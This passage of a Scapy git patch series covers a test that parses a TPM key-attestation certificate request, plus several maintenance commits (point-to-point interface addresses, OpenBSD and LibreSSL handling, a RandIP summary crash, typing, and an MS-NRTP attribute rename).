xZwWhSqIr3pWnzMMLQjhgXWl/cAeKVAqdgEk2bzqLFtlAFHdAutaKbb7Nc5f57pd + 379XJCHz6WKoOv2gJ1ONduAIstzQz075PkSJop4PEGecVQN6BrglKxIbgzDXhua4 + GpOnhhOok4UTNfJIPDZaeaTfs8h8fVb2uayF2/jOjY11cVILilmKSDuUDeebw28g + 0a+1Nx9jlcl9j+KNDah7IU85x/IAVDNATd2/XscqfvtJlKfZJ6aFl10kGYsAR0Lg + LG6MMwuA9+R/jAyD1m281A935cLHQJWrXuknumTy9uOpRUuPPoTdWbYBTwKShRIR + K9sx0GtPjX3n5T+dyxH/kU0H8b5WV9pRwh6yoJoaUVcVn8adNmMFlB3blDJl8b/S + rL6qveSkbZ7+uz5D2RmBOZ/jCtJAjK208rDDe92VoqzskQitklk+7pbANpu8m5V/ + spTpjrcT285UrX7OndixV0Pge6TAPu2pdRdfhnurKypNDiwy9cmNhaETJ+iPRnAT + KBYoG0mZ2PkxFkFPCxJR+zgatqhzXs/hA4TJ7MofkIGXIRobWjNqMfsUW2Ghckyg + knt2UpaXlhGu+dMd9MxABQoi4XV8rUvLXgAAAAYAII/NIWmrkmlODGM/GrdyhCuC + QbvCAoiYH8esHt3B/dsOACDlKfXWEShylU6O1mBRF7dX4jfG4ZUTqUn+4fIExFgC + OgAgryylaWmcQ2ohAG8cuKJ1bJi8HHZaNVnF/hw/XnIop+cAIMQTqEexERKxy93U + 7KTaqhWhhSwcO7pXRh0ldgXz1a9TAAAAIASOmjrOCFg/efNE/3hbvqnwesf6MyWz + 1Joh3VGUxlhQMA0GCSqGSIb3DQEBCwUAA4IBAQAFdfYs0Yr+xJARwI+LFcnovE0l + cflenUU+kS9DKhkPqDa4sohAnRZjFYdyO03ZgiLAZiloim6xmweiuL2JLoBVXKvP + OpDAgad8VIsaGnI6IcXA9BOfomOGSA4cVPQtNY+t4PhGUA10BJIBtEJZg/N5jeDG + guGRXQ2qWbQErdYxAxizOmnL57tpxu28uDrZntk/qKILuDUg3+tr0LbWbLOlHgO9 + +LQu4ta6r8wezDr+lPMxwebQbs+FG4mABZh7KbFwmY99A+D0oBmzux7hcnn+wcuj + xFHYDjb/I8Vf9j5PTPQocTKhWhu5aL7NSw2+n4pHEOQEagxq3OMGQdXyUES0MAAw + ADGCAYswggGHAgEDgBQXrS8olF0ZZV2Mqtp+hS3WaRHvtTANBglghkgBZQMEAgEF + AKBKMBcGCSqGSIb3DQEJAzEKBggrBgEFBQcMAjAvBgkqhkiG9w0BCQQxIgQg0kqg + 81xB1m/LLoZDKzDhfcVOspXFPksgry+6L5mFbm8wDQYJKoZIhvcNAQEBBQAEggEA + UiwjsitLu/WBMk6vZ3obYzlo7CRfVnvW/mD0V1krdX1CvWaKa5hfn1A0uSvPxCCs + P2HXkypXdpNULHObhJruTfF5PpIwzy99vC1K+SOpdit/UJVZqYGf4K+pCIupwrnK + yPq7I9WtOgBdSjkjVeAWT4hxHqlZHvEeGaXAWqn/vtvX+FdCK3jxG5hA0UYf73oW + ogD1BwEtkCzGWXqZokM2VlJt64iaozwf/4+N8e/fdFJTvdbUILHq1y90r3P2mU/w + wmhn6is20QiTBQZCwPL9dKU+VY6ylJEkD1DzdBkZqZHrj4HrDMJ0e0FB1/iEb5Wq + tDcJu1pwwhhwrsR9l8iKGw== + -----END NEW CERTIFICATE REQUEST----- +""".replace(" ", "")) + +assert csr.verifySelf() + +assert isinstance(csr.csr, CMS_ContentInfo) +cms = csr.csr + +assert cms.content.signerInfos[0].version == 3 +assert cms.content.signerInfos[0].sid.sid == b'\x17\xad/(\x94]\x19e]\x8c\xaa\xda~\x85-\xd6i\x11\xef\xb5' +assert cms.content.signerInfos[0].digestAlgorithm.algorithm.oidname == "sha256" +assert cms.content.signerInfos[0].signatureAlgorithm.algorithm.oidname == "rsaEncryption" + += CSR class - Parse CSR in CMC format - Advanced (KeyAttestation + sha256) - Unpack and verify + +from scapy.layers.tpm import * + +cms_engine = CMS_Engine([csr]) +pkidata = cms_engine.verify(cms) + +assert isinstance(pkidata, CMC_PKIData) + +assert isinstance(pkidata.reqSequence[0], CMC_TaggedRequest) +certReqInfo = pkidata.reqSequence[0].request.certificationRequest.certificationRequestInfo +assert certReqInfo.version == 0 +assert certReqInfo.attributes[0].type.oidname == "OID_OS_VERSION" +assert certReqInfo.attributes[0].values[0].value == b'10.0.26200.2' + +assert certReqInfo.attributes[2].type.oidname == 'OID_ENROLL_KSP_NAME' +assert certReqInfo.attributes[2].values[0].value.val.decode("utf-16be") == 'Microsoft Platform Crypto Provider' + +assert certReqInfo.attributes[3].type.oidname == "OID_ENROLLMENT_CSP_PROVIDER" +assert certReqInfo.attributes[3].values[0].value.ProviderName.val.decode("utf-16be") == 'Microsoft Platform Crypto Provider' + +assert certReqInfo.attributes[4].type.oidname == "extensionRequest" +exts = certReqInfo.attributes[4].values[0].value.extensions + +assert exts[0].extnID.oidname == "OID_CERTIFICATE_TEMPLATE" +assert exts[0].extnValue.templateID.val == '1.3.6.1.4.1.311.21.8.1415300.5673647.8799678.6129036.5456320.107.14318748.4913403' +assert exts[0].extnValue.templateMajorVersion == 100 +assert exts[0].extnValue.templateMinorVersion == 7 + +assert exts[1].extnID.oidname == "extKeyUsage" +assert exts[1].extnValue.extendedKeyUsage[0].oid.oidname == 'iKEIntermediate' + +assert exts[2].extnID.oidname == "keyUsage" +assert bool(exts[2].critical) is True +assert exts[2].extnValue.keyUsage == "101" + +assert exts[3].extnID.oidname == "OID_APPLICATION_CERT_POLICIES" +assert isinstance(exts[3].extnValue, X509_ExtCertificatePolicies) +assert exts[3].extnValue.certificatePolicies[0].policyIdentifier.oidname == 'iKEIntermediate' + +assert exts[4].extnID.oidname == "subjectKeyIdentifier" +assert exts[4].extnValue.keyIdentifier == b"\x17\xad/(\x94]\x19e]\x8c\xaa\xda~\x85-\xd6i\x11\xef\xb5" + +assert certReqInfo.attributes[5].type.oidname == "OID_ENROLL_EK_INFO" +cms_enveloppe = certReqInfo.attributes[5].values[0].value +assert cms_enveloppe.contentType.oidname == "id-envelopedData" +assert isinstance(cms_enveloppe.content.recipientInfos[0].recipientInfo, CMS_KeyTransRecipientInfo) +assert cms_enveloppe.content.encryptedContentInfo.contentType.oidname == 'pkcs-7.1' + +assert certReqInfo.attributes[6].type.oidname == "OID_ENROLL_ATTESTATION_STATEMENT" +cmc_enrollment = certReqInfo.attributes[6].values[0].value +assert isinstance(cmc_enrollment.kas, KeyAttestationStatement) +assert cmc_enrollment.kas.Version == 1 + +idBinding = cmc_enrollment.kas.idBinding +assert isinstance(idBinding, PCP_IDBinding20) +assert idBinding.PublicKey.publicArea.objectAttributes == 328818 +assert idBinding.PublicKey.publicArea.authPolicy.buffer == b'\x9d\xff\xcb\xf3l8:\xe6\x99\xfb\x98h\xdcm\xcb\x89\xd7\x158\x84\xbe(\x03\x92,\x12AX\xbf\xad"\xae' +assert idBinding.CreationData.creationData.pcrSelect.count == 0 +assert idBinding.CreationData.creationData.pcrDigest.buffer == b"\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U" +assert idBinding.CreationData.creationData.locality.Extended == 1 +assert idBinding.CreationData.creationData.sprintf("%parentNameAlg%") == 'TPM_ALG_SHA256' +assert idBinding.CreationData.creationData.parentName.Name == b'\x00\x0b\x0e\xa7[\x12x5\xe3_\x10\xc7\xfc\xcd3Za\xe3.\xde\xf6\xbc\x0b\xd9Y\xbamn\x87I\xb6b\x8b\xa8' +assert idBinding.Attest.attestationData.qualifiedSigned.Name == b'\x00\x0b\xb5\xb4e\x88\xdbDN\x9c\xf0ICV\xd7\xc5]n\x91\r|\xd5\x89D\x9a]\xebL\x04\x90\xbb$\xd7\x0f' +assert idBinding.Attest.attestationData.extraData.buffer == b'w\x06\xa2\x0f*\xef2\xd8\x00C\x85X$\n\xed\x1c\xectlT' +assert idBinding.Attest.attestationData.attested.objectName.Name == b"\x00\x0b'\x82s(\n\x07\x19\x99Wo\\\xac\xe3ZMiUr\xe9\x0fZ2\x8b\xb5{\xb1C\xff-\xccz\xa3" +assert idBinding.Attest.attestationData.attested.creationHash.buffer == b'.\xd0\xb6\ns\xf1\x0b\x8a\xdb\x08Z\x0c\xfe(\xec\xe3\xf6C\x1dp\xf3\xe6\x07\x9c879\x83~\x824f' +assert idBinding.Signature.sprintf("%sigAlg%") == "TPM_ALG_RSASSA" +assert idBinding.Signature.signature.sprintf("%hash%") == "TPM_ALG_SHA1" + +keyAttestation = cmc_enrollment.kas.keyAttestation +assert isinstance(keyAttestation, KeyAttestation) +assert keyAttestation.sprintf("%Platform%") == "TPM 2.0" +assert keyAttestation.keyBlob.flags & 2 +assert keyAttestation.keyBlob.public.publicArea.objectAttributes.fixedTPM +assert keyAttestation.keyBlob.public.publicArea.objectAttributes.userWithAuth +assert keyAttestation.keyBlob.public.publicArea.parameters.symmetric.sprintf("%algorithm%") == 'TPM_ALG_NULL' +assert keyAttestation.keyBlob.public.publicArea.parameters.scheme.sprintf("%scheme%") == 'TPM_ALG_NULL' +assert [x.buffer for x in keyAttestation.keyBlob.policyDigestList.digests] == [ + b'\x8f\xcd!i\xab\x92iN\x0cc?\x1a\xb7r\x84+\x82A\xbb\xc2\x02\x88\x98\x1f\xc7\xac\x1e\xdd\xc1\xfd\xdb\x0e', + b'\xe5)\xf5\xd6\x11(r\x95N\x8e\xd6`Q\x17\xb7W\xe27\xc6\xe1\x95\x13\xa9I\xfe\xe1\xf2\x04\xc4X\x02:', + b'\xaf,\xa5ii\x9cCj!\x00o\x1c\xb8\xa2ul\x98\xbc\x1cvZ5Y\xc5\xfe\x1c?^r(\xa7\xe7', + b'\xc4\x13\xa8G\xb1\x11\x12\xb1\xcb\xdd\xd4\xec\xa4\xda\xaa\x15\xa1\x85,\x1c;\xbaWF\x1d%v\x05\xf3\xd5\xafS', + b'', + b'\x04\x8e\x9a:\xce\x08X?y\xf3D\xffx[\xbe\xa9\xf0z\xc7\xfa3%\xb3\xd4\x9a!\xddQ\x94\xc6XP', +] + +aikOpaque = cmc_enrollment.kas.aikOpaque +assert isinstance(aikOpaque, PCP_20_KEY_BLOB) +assert aikOpaque.public.publicArea.unique.buffer == b'\xc6\x1c\x7f\xc4KC\xc2 \x9b;a/\x888\x84\x0e4w5\xb4\x01\'\xb8/\x1c\xc2\xe9\xc3;v\x8dUb4\x8c\xde\xd09\xd9\x1dSPC\xaa\xcb\xcc[N6Z\xedK\\\xa8\xe3\x94h:\x04(|\xc1\x08\x15\x12]Z\xf7\xc6,\x94\x9c\xe1\x145e\xee\x8c\x89/\xd0\xea>\x91\xc1\xb4\x1cl\xc5\xaa\x9c\xca)\t\xbb\nhv\xdb3\xf3\xbe\xdcLYj\xc8g.VN\xdc\xbd\x95\xfc\x05"\xc7\xc7\xf2{w\x1b\x18\xba\xf6\xa4\x93\x00V?\x87 \xa5U\x96\x807\xa5\xa5\x0b\x11O\x7f\x1br\x96H\x1e1\xf7z\xcc\xd7\x1e\x132SD\xc1F\x9d|Ud9]\xa3[\xff6\xa9\xc0\xa7\x9e]\xf4\xdc=1\xe7\xa9i\xc9\xcaI\xd9\x80\x84\xa3\xe7f\x0f\n\xb2\xe9o\x13\x12Vg}\x85\xbd\x14^<\xe6\x10WQ3\x0e\xcci\x99(\xc60\x87\xa4+\xbdw\x03RD\xef\x87/[\x9f\x04C}\xf2\x18]\x8f\xb4x\x04\xb2\xe6\xd8h\xf9\xad\xef\x88?\xea\x88\x07\xecu' +assert [x.buffer for x in aikOpaque.policyDigestList.digests] == [ + b'\x8f\xcd!i\xab\x92iN\x0cc?\x1a\xb7r\x84+\x82A\xbb\xc2\x02\x88\x98\x1f\xc7\xac\x1e\xdd\xc1\xfd\xdb\x0e', + b'\xe5)\xf5\xd6\x11(r\x95N\x8e\xd6`Q\x17\xb7W\xe27\xc6\xe1\x95\x13\xa9I\xfe\xe1\xf2\x04\xc4X\x02:', + b'\xaf,\xa5ii\x9cCj!\x00o\x1c\xb8\xa2ul\x98\xbc\x1cvZ5Y\xc5\xfe\x1c?^r(\xa7\xe7', + b'\xc4\x13\xa8G\xb1\x11\x12\xb1\xcb\xdd\xd4\xec\xa4\xda\xaa\x15\xa1\x85,\x1c;\xbaWF\x1d%v\x05\xf3\xd5\xafS', + b'', + b'\x04\x8e\x9a:\xce\x08X?y\xf3D\xffx[\xbe\xa9\xf0z\xc7\xfa3%\xb3\xd4\x9a!\xddQ\x94\xc6XP', +] \ No newline at end of file From 9c3d51c148090c3f2d4774714efae9e69e4d7f8f Mon Sep 17 00:00:00 2001 From: 0x-0ddc0de <133626972+0x-0ddc0de@users.noreply.github.com> Date: Mon, 22 Dec 2025 05:40:31 -0800 Subject: [PATCH 1573/1632] Fix interface IP for point-to-point links (#4887) - For point-to-point links, IFA_ADDRESS is the peer rather than local interface IP; we need to instead use IFA_LOCAL --- scapy/arch/linux/rtnetlink.py | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index d5d267df10a..5e0e72d404b 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -774,18 +774,23 @@ def _get_ips(af_family=socket.AF_UNSPEC): ifindex = msg.ifa_index address = None family = msg.ifa_family + local = None for attr in msg.data: if attr.rta_type == 0x01: # IFA_ADDRESS address = attr.rta_data - break - if address is not None: + elif attr.rta_type == 0x02: # IFA_LOCAL + local = attr.rta_data + # include/uapi/linux/if_addr.h: for point-to-point links, IFA_LOCAL is the local + # interface address and IFA_ADDRESS is the peer address + local_address = local if local is not None else address + if local_address is not None: data = { "af_family": family, "index": ifindex, - "address": address, + "address": local_address, } if family == 10: # ipv6 - data["scope"] = scapy.utils6.in6_getscope(address) + data["scope"] = scapy.utils6.in6_getscope(local_address) ips.setdefault(ifindex, list()).append(data) return ips From 40fc5ecf9e69e9bd76664d63ae133d4973fcf81b Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Thu, 25 Dec 2025 13:31:39 +0100 Subject: [PATCH 1574/1632] OpenBSD: fix tests and disallow LibreSSL (#4888) --- scapy/config.py | 33 ++++++++++++++++++++++- scapy/contrib/automotive/autosar/secoc.py | 2 +- scapy/contrib/macsec.py | 2 +- scapy/contrib/psp.py | 2 +- scapy/layers/dot11.py | 2 +- scapy/layers/inet.py | 15 +++++++++-- scapy/layers/inet6.py | 4 ++- scapy/layers/ipsec.py | 2 +- scapy/layers/tls/__init__.py | 2 +- test/regression.uts | 5 ++-- test/tuntap.uts | 4 +-- 11 files changed, 59 insertions(+), 14 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index be3cb25b278..3c5f05cf49b 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -745,10 +745,13 @@ def isCryptographyValid(): Check if the cryptography module >= 2.0.0 is present. This is the minimum version for most usages in Scapy. """ + # Check import try: import cryptography except ImportError: return False + + # Check minimum version return _version_checker(cryptography, (2, 0, 0)) @@ -771,6 +774,23 @@ def isCryptographyAdvanced(): return True +def isCryptographyBackendCompatible() -> bool: + """ + Check if the cryptography backend is compatible + """ + # Check for LibreSSL + try: + from cryptography.hazmat.backends import default_backend + if "LibreSSL" in default_backend().openssl_version_text(): + # BUG: LibreSSL - https://marc.info/?l=libressl&m=173846028619304&w=2 + # It takes 5 whole minutes to import RFC3526's modp parameters. This is + # not okay. + return False + return True + except Exception: + return True + + def isPyPy(): # type: () -> bool """Returns either scapy is running under PyPy or not""" @@ -1199,6 +1219,17 @@ def __getattribute__(self, attr): conf = Conf() # type: Conf +if not isCryptographyBackendCompatible(): + conf.crypto_valid = False + conf.crypto_valid_advanced = False + log_scapy.error( + "Scapy does not support LibreSSL as a backend to cryptography ! " + "See https://cryptography.io/en/latest/installation/#static-wheels " + "for instructions on how to recompile cryptography with another " + "backend." + ) + + def crypto_validator(func): # type: (DecoratorCallable) -> DecoratorCallable """ @@ -1209,7 +1240,7 @@ def func_in(*args, **kwargs): # type: (*Any, **Any) -> Any if not conf.crypto_valid: raise ImportError("Cannot execute crypto-related method! " - "Please install python-cryptography v1.7 or later.") # noqa: E501 + "Please install python-cryptography v2.0 or later.") # noqa: E501 return func(*args, **kwargs) return func_in diff --git a/scapy/contrib/automotive/autosar/secoc.py b/scapy/contrib/automotive/autosar/secoc.py index d93f62aa3c5..d83949e268e 100644 --- a/scapy/contrib/automotive/autosar/secoc.py +++ b/scapy/contrib/automotive/autosar/secoc.py @@ -16,7 +16,7 @@ from cryptography.hazmat.primitives import cmac from cryptography.hazmat.primitives.ciphers import algorithms else: - log_loading.info("Can't import python-cryptography v1.7+. " + log_loading.info("Can't import python-cryptography v2.0+. " "Disabled SecOC calculate_cmac.") from scapy.config import conf diff --git a/scapy/contrib/macsec.py b/scapy/contrib/macsec.py index ac90972246a..f3e75d61afa 100755 --- a/scapy/contrib/macsec.py +++ b/scapy/contrib/macsec.py @@ -33,7 +33,7 @@ modes, ) else: - log_loading.info("Can't import python-cryptography v1.7+. " + log_loading.info("Can't import python-cryptography v2.0+. " "Disabled MACsec encryption/authentication.") diff --git a/scapy/contrib/psp.py b/scapy/contrib/psp.py index ded095ed4ee..cf656b67754 100644 --- a/scapy/contrib/psp.py +++ b/scapy/contrib/psp.py @@ -65,7 +65,7 @@ aead, ) else: - log_loading.info("Can't import python-cryptography v1.7+. " + log_loading.info("Can't import python-cryptography v2.0+. " "Disabled PSP encryption/authentication.") ############################################################################### diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 63b3aeec551..3e70571509e 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -73,7 +73,7 @@ decrepit_algorithms = algorithms else: default_backend = Ciphers = algorithms = decrepit_algorithms = None - log_loading.info("Can't import python-cryptography v1.7+. Disabled WEP decryption/encryption. (Dot11)") # noqa: E501 + log_loading.info("Can't import python-cryptography v2.0+. Disabled WEP decryption/encryption. (Dot11)") # noqa: E501 ######### diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 6e01c9b253f..cc3ea479a62 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -19,8 +19,17 @@ linehexdump, strxor, whois, colgen from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Gen, Net, _ScopedIP -from scapy.data import ETH_P_IP, ETH_P_ALL, DLT_RAW, DLT_RAW_ALT, DLT_IPV4, \ - IP_PROTOS, TCP_SERVICES, UDP_SERVICES +from scapy.consts import OPENBSD +from scapy.data import ( + ETH_P_IP, + ETH_P_ALL, + DLT_RAW, + DLT_RAW_ALT, + DLT_IPV4, + IP_PROTOS, + TCP_SERVICES, + UDP_SERVICES, +) from scapy.layers.l2 import ( CookedLinux, Dot3, @@ -1358,6 +1367,8 @@ def mysummary(self): conf.l2types.register(DLT_RAW, IP) conf.l2types.register_num2layer(DLT_RAW_ALT, IP) conf.l2types.register(DLT_IPV4, IP) +if OPENBSD: + conf.l2types.register_num2layer(228, IP) conf.l3types.register(ETH_P_IP, IP) conf.l3types.register_num2layer(ETH_P_ALL, IP) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index b585c92ea70..dc101664796 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -22,7 +22,7 @@ from scapy.as_resolvers import AS_resolver_riswhois from scapy.base_classes import Gen, _ScopedIP from scapy.compat import chb, orb, raw, plain_str, bytes_encode -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, OPENBSD from scapy.config import conf from scapy.data import ( DLT_IPV6, @@ -4213,6 +4213,8 @@ def _load_dict(d): conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, IPv46) conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) +if OPENBSD: + conf.l2types.register_num2layer(229, IPv6) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 921f9800748..8cff919102a 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -221,7 +221,7 @@ def data_for_encryption(self): DES.key_sizes = decrepit_algorithms.TripleDES.key_sizes DES.block_size = decrepit_algorithms.TripleDES.block_size else: - log_loading.info("Can't import python-cryptography v1.7+. " + log_loading.info("Can't import python-cryptography v2.0+. " "Disabled IPsec encryption/authentication.") default_backend = None InvalidTag = Exception diff --git a/scapy/layers/tls/__init__.py b/scapy/layers/tls/__init__.py index ecdcac9a096..80e213fbbef 100644 --- a/scapy/layers/tls/__init__.py +++ b/scapy/layers/tls/__init__.py @@ -91,5 +91,5 @@ if not conf.crypto_valid: import logging log_loading = logging.getLogger("scapy.loading") - log_loading.info("Can't import python-cryptography v1.7+. " + log_loading.info("Can't import python-cryptography v2.0+. " "Disabled PKI & TLS crypto-related features.") diff --git a/test/regression.uts b/test/regression.uts index 86b8c7f064b..4beb41787ac 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -533,7 +533,7 @@ if len(routes6) > 2 and not WINDOWS: # Identify routes to fe80::/64 assert sum(1 for r in routes6 if r[0] == "::1" and r[4] == ["::1"]) >= 1 if len(iflist) >= 2: - assert sum(1 for r in routes6 if ll_route.match(r[0]) and r[1] == 64) >= 1 + assert sum(1 for r in routes6 if ll_route.match(r[0])) >= 1 try: # Identify a route to a node IPv6 link-local address assert sum(1 for r in routes6 if in6_islladdr(r[0]) and r[1] == 128) >= 1 @@ -2941,11 +2941,12 @@ class BSDLoader: for p in self.patches: p.start() return pfroute - def __exit__(self, *args, **kwargs): + def __exit__(self, type, value, traceback): for p in self.loadpatches: p.stop() for p in self.patches: p.stop() + importlib.reload(scapy.arch.bpf.pfroute) = OpenBSD 7.5 amd64 - read_routes() diff --git a/test/tuntap.uts b/test/tuntap.uts index 1ba470ea175..2caaf632baa 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -37,10 +37,10 @@ assert p.addr_family == 2 assert isinstance(p.payload, IP) p = DarwinUtunPacketInfo()/IPv6() -assert p.addr_family == 30 +assert p.addr_family == socket.AF_INET6 p = DarwinUtunPacketInfo(raw(p)) -assert p.addr_family == 30 +assert p.addr_family == socket.AF_INET6 assert isinstance(p.payload, IPv6) ####### From a5bc2bbf9a13f4681f8eda830b167a14bef0b6b9 Mon Sep 17 00:00:00 2001 From: Kelvin Estrada Date: Mon, 5 Jan 2026 21:39:01 -0400 Subject: [PATCH 1575/1632] Fix IP.Summary() crash when dst is RandIP() --- scapy/layers/inet.py | 2 ++ test/scapy/layers/inet.uts | 6 ++++++ 2 files changed, 8 insertions(+) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index cc3ea479a62..da98ab018c7 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -586,6 +586,8 @@ def route(self): if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 + if not isinstance(dst, (str, bytes, int)): + dst = str(dst) return conf.route.route(dst, dev=scope) def hashret(self): diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index ab5cbd56781..d898c0ef6d7 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -92,6 +92,12 @@ pkts = sniff(offline=pkts, session=IPSession) assert len(pkts) == 2 assert pkts[1].load == b"X" * 1500 += IPSession - summary with RandIP() does not crash + +pkt = IP(dst=RandIP()) +s = pkt.summary() +assert isinstance(s, str) + = StringBuffer buffer = StringBuffer() From f303033267c828a846b5ee645d5fc2a43a927709 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 11 Jan 2026 19:58:00 +0100 Subject: [PATCH 1576/1632] Enhance SuperSocket for AnsweringMachine typing (#4897) * Enhance SuperSocket for AnsweringMachine typing and compatibility improvements * Refactor imports in supersocket.py to use TYPE_CHECKING for AnsweringMachine. --------- Co-authored-by: Nils Weiss --- scapy/supersocket.py | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 5ffd7a30f63..9c5b74a3b52 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -44,14 +44,21 @@ Optional, Tuple, Type, + TypeVar, cast, + TYPE_CHECKING, ) +from scapy.compat import Self + +if TYPE_CHECKING: + from scapy.ansmachine import AnsweringMachine + # Utils class _SuperSocket_metaclass(type): - desc = None # type: Optional[str] + desc = None # type: Optional[str] def __repr__(self): # type: () -> str @@ -82,10 +89,13 @@ class tpacket_auxdata(ctypes.Structure): # SuperSocket +_T = TypeVar("_T", Packet, PacketList) + + class SuperSocket(metaclass=_SuperSocket_metaclass): closed = False # type: bool nonblocking_socket = False # type: bool - auxdata_available = False # type: bool + auxdata_available = False # type: bool def __init__(self, family=socket.AF_INET, # type: int @@ -271,19 +281,17 @@ def tshark(self, *args, **kargs): from scapy import sendrecv sendrecv.tshark(opened_socket=self, *args, **kargs) - # TODO: use 'scapy.ansmachine.AnsweringMachine' when typed def am(self, - cls, # type: Type[Any] - *args, # type: Any + cls, # type: Type[AnsweringMachine[_T]] **kwargs # type: Any ): - # type: (...) -> Any + # type: (...) -> AnsweringMachine[_T] """ Creates an AnsweringMachine associated with this socket. :param cls: A subclass of AnsweringMachine to instantiate """ - return cls(*args, opened_socket=self, socket=self, **kwargs) + return cls(opened_socket=self, socket=self, **kwargs) @staticmethod def select(sockets, remain=conf.recv_poll_rate): @@ -295,6 +303,7 @@ def select(sockets, remain=conf.recv_poll_rate): :returns: an array of sockets that were selected and the function to be called next to get the packets (i.g. recv) """ + inp = [] # type: List[SuperSocket] try: inp, _, _ = select(sockets, [], [], remain) except (IOError, select_error) as exc: @@ -309,7 +318,7 @@ def __del__(self): self.close() def __enter__(self): - # type: () -> SuperSocket + # type: () -> Self return self def __exit__(self, exc_type, exc_value, traceback): @@ -627,6 +636,7 @@ def _iter(obj=cast(SndRcvList, obj)): s.time = s.sent_time yield s yield r + self.iter = _iter() elif isinstance(obj, (list, PacketList)): if isinstance(obj[0], bytes): From 64aba8116ffd31a3b73e1dbaab04588d197ea34b Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sun, 8 Feb 2026 17:28:32 +0100 Subject: [PATCH 1577/1632] [MS-NRTP] do not use 'type' attribute (#4909) --- scapy/layers/ms_nrtp.py | 34 +++++++++++++++++----------------- test/scapy/layers/msnrtp.uts | 24 ++++++++++++------------ 2 files changed, 29 insertions(+), 29 deletions(-) diff --git a/scapy/layers/ms_nrtp.py b/scapy/layers/ms_nrtp.py index 34c672f87be..d97abb18e77 100644 --- a/scapy/layers/ms_nrtp.py +++ b/scapy/layers/ms_nrtp.py @@ -602,7 +602,7 @@ def _members_cb(pkt, lst, cur, remain): ].Value return functools.partial( NRBFMemberPrimitiveUnTyped, - type=PrimitiveTypeEnum(primitiveType), + primtype=PrimitiveTypeEnum(primitiveType), ) return NRBFRecord @@ -639,14 +639,14 @@ class NRBFClassInfo(Packet): class NRBFAdditionalInfo(Packet): - __slots__ = ["type"] + __slots__ = ["bintype"] fields_desc = [ MultipleTypeField( [ ( ByteEnumField("Value", 0, PrimitiveTypeEnum), - lambda pkt: pkt.type + lambda pkt: pkt.bintype in [ BinaryTypeEnum.Primitive, BinaryTypeEnum.PrimitiveArray, @@ -656,11 +656,11 @@ class NRBFAdditionalInfo(Packet): PacketField( "Value", NRBFLengthPrefixedString(), NRBFLengthPrefixedString ), - lambda pkt: pkt.type == BinaryTypeEnum.SystemClass, + lambda pkt: pkt.bintype == BinaryTypeEnum.SystemClass, ), ( PacketField("Value", NRBFClassTypeInfo(), NRBFClassTypeInfo), - lambda pkt: pkt.type == BinaryTypeEnum.Class, + lambda pkt: pkt.bintype == BinaryTypeEnum.Class, ), ], StrFixedLenField("Value", b"", length=0), @@ -668,18 +668,18 @@ class NRBFAdditionalInfo(Packet): ] def __init__(self, _pkt=None, **kwargs): - self.type = kwargs.pop("type", BinaryTypeEnum.Primitive) - assert isinstance(self.type, BinaryTypeEnum) + self.bintype = kwargs.pop("bintype", BinaryTypeEnum.Primitive) + assert isinstance(self.bintype, BinaryTypeEnum) super(NRBFAdditionalInfo, self).__init__(_pkt, **kwargs) def clone_with(self, *args, **kwargs): pkt = super(NRBFAdditionalInfo, self).clone_with(*args, **kwargs) - pkt.type = self.type + pkt.bintype = self.bintype return pkt def copy(self): pkt = super(NRBFAdditionalInfo, self).copy() - pkt.type = self.type + pkt.bintype = self.bintype return pkt def default_payload_class(self, payload): @@ -715,7 +715,7 @@ def _member_type_infos_cb(pkt, lst, cur, remain): # Return BinaryTypeEnum tainted with a pre-selected type. return functools.partial( NRBFAdditionalInfo, - type=typeEnum, + bintype=typeEnum, ) @@ -752,30 +752,30 @@ class NRBFClassWithId(NRBFRecord): class NRBFMemberPrimitiveUnTyped(Packet): - __slots__ = ["type"] + __slots__ = ["primtype"] fields_desc = [ NRBFValueWithCode.fields_desc[1], ] def __init__(self, _pkt=None, **kwargs): - self.type = kwargs.pop("type", PrimitiveTypeEnum.Byte) - assert isinstance(self.type, PrimitiveTypeEnum) + self.primtype = kwargs.pop("primtype", PrimitiveTypeEnum.Byte) + assert isinstance(self.primtype, PrimitiveTypeEnum) super(NRBFMemberPrimitiveUnTyped, self).__init__(_pkt, **kwargs) def clone_with(self, *args, **kwargs): pkt = super(NRBFMemberPrimitiveUnTyped, self).clone_with(*args, **kwargs) - pkt.type = self.type + pkt.primtype = self.primtype return pkt def copy(self): pkt = 